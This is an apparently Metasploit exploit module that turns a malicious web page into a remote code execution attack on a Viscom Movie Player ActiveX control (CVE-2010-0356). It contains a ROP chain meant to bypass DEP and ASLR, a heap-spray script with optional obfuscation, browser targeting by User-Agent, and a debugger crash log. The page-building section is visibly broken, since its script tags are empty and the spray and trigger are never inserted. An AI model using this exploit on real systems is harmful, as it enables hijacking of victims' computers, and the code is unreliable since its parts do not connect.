require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
'Description'=> %q{
Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control
in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows
remote attackers to execute arbitrary code via a long strFontName parameter to the
DrawText method.
The victim will first be required to trust the publisher Viscom Software.
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
with Java support.
},
'License'=> MSF_LICENSE,
'Author' =>
[
'shinnai',
'TecR0c',
'mr_me'
],
'Version'=> '$Revision: $',
'References' =>
[
[ 'CVE', '2010-0356' ],
[ 'OSVDB', '61634' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload'=>
{
'Space'=> 1024,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets'=>
[
[ 'Automatic', {} ],
[ 'Windows IE6-7', {} ],
[ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
],
'DisclosureDate' => 'Jan 12 2010',
'DefaultTarget'=> 0))
register_options(
[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
my_target = target
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
my_target = targets[1]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2]
end
end
sploit = rand_text_alpha(32)
pivot_addr = 0x1126cfe4
if my_target.name =~ /IE8/
pivot_rop =
[
0x10015201,
pivot_addr,
0x10014361,
junk,
junk,
junk,
junk,
junk,
0x1001c049,
].pack("V*")
sploit << pivot_rop
code = [0x7C347F98].pack("V") * 4
code <<
[
0x7C37653D,
0xFFFFFDFF,
0x7C347F98,
0x7C3415A2,
0xFFFFFFFF,
0x7C376402,
0x7C351E05,
0x7C345255,
0x7C352174,
0x7C344F87,
0xFFFFFFC0,
0x7C351EB1,
0x7C34D201,
0x7C38B001,
0x7C347F97,
0x7C37A151,
0x7C378C81,
0x7C345C30,
].pack("V*")
code << payload.encoded
else
code = payload.encoded
sploit << [pivot_addr].pack('V*')
end
code = Rex::Text.to_unescape(code)
spray = <<-JS
var heap_lib = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x800-0x20);
var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x7fb00-6)/2);
heap_lib.gc();
for (var i = 0; i < 0x200; i++) {
heap_lib.alloc(block);
}
JS
js = heaplib(spray)
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
vname = rand_text_alpha(rand(100) + 1)
strname = rand_text_alpha(rand(100) + 1)
html = %Q|<html>
<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>
<script>
<script language='vbscript'>
</script>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end
=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
41414141 ?????
0:005> dd @esp
0203f30041414141 41414141 41414141 41414141
0203f31041414141 41414141 41414141 41414141
0203f32041414141 41414141 41414141 41414141
0203f33041414141 41414141 41414141 41414141
0203f34041414141 41414141 41414141 41414141
0203f35041414141 41414141 41414141 41414141
0203f36041414141 41414141 41414141 41414141
0203f37041414141 41414141 41414141 41414141
=end